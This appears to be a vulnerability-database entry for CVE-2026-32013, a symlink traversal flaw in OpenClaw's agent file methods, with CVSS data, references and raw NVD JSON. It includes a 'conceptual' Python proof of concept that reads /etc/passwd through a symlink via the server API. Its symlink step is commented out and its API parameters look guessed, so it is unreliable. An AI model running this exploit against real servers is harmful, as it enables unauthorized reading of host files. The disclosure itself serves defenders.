CVE-2026-32013

Description

OpenClaw versions prior to 2026.2.25 contain a symlink traversal vulnerability in the agents.files.get and agents.files.set methods that allows reading and writing files outside the agent workspace. Attackers can exploit symlinked allowlisted files to access arbitrary host files within gateway process permissions, potentially enabling code execution through file overwrite attacks.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.25

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-32013 (Conceptual)
# Exploiting symlink traversal in OpenClaw agents.files methods

import requests
import json

TARGET = "http://vulnerable-openclaw-server:8080"
AGENT_ID = "compromised_agent_id"

# 1. Create a symlink inside the workspace pointing to a sensitive file (e.g., /etc/passwd)
symlink_payload = {
    "method": "agents.files.set",
    "params": {
        "agent_id": AGENT_ID,
        "path": "malicious_link",
        "target": "/etc/passwd",  # The symlink target
        "action": "create_symlink"
    }
}

# 2. Read the sensitive file through the symlink
read_payload = {
    "method": "agents.files.get",
    "params": {
        "agent_id": AGENT_ID,
        "path": "malicious_link"
    }
}

try:
    print("[*] Attempting to exploit symlink traversal...")
    # Step 1: Setup Symlink (Mechanism depends on actual API implementation)
    # r = requests.post(f"{TARGET}/api", json=symlink_payload)
    
    # Step 2: Read file via symlink
    r = requests.post(f"{TARGET}/api", json=read_payload)
    
    if r.status_code == 200:
        data = r.json()
        print("[+] Exploit successful! Leaked content:")
        print(json.dumps(data, indent=2))
    else:
        print("[-] Request failed.")
        
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32013
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32013
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32013/
[4] VulDB https://vuldb.com/cve/CVE-2026-32013
[5] https://github.com/openclaw/openclaw/commit/125f4071bcbc0de32e769940d07967db47f09d3d
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-fgvx-58p6-gjwc
[7] https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-agents-files-methods

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32013", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:34.410", "lastModified": "2026-03-23T18:29:35.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.25 contain a symlink traversal vulnerability in the agents.files.get and agents.files.set methods that allows reading and writing files outside the agent workspace. Attackers can exploit symlinked allowlisted files to access arbitrary host files within gateway process permissions, potentially enabling code execution through file overwrite attacks."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.25 contienen una vulnerabilidad de recorrido de enlaces simbólicos en los métodos agents.files.get y agents.files.set que permite la lectura y escritura de archivos fuera del espacio de trabajo del agente. Los atacantes pueden explotar archivos permitidos con enlaces simbólicos para acceder a archivos arbitrarios del host dentro de los permisos del proceso de la pasarela, lo que podría permitir la ejecución de código mediante ataques de sobrescritura de archivos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.25", "matchCriteriaId": "E7CAF2B9-46A9-45F0-8621-6485989E84AD"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/125f4071bcbc0de32e769940d07967db47f09d3d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fgvx-58p6-gjwc", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-agents-files-methods", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}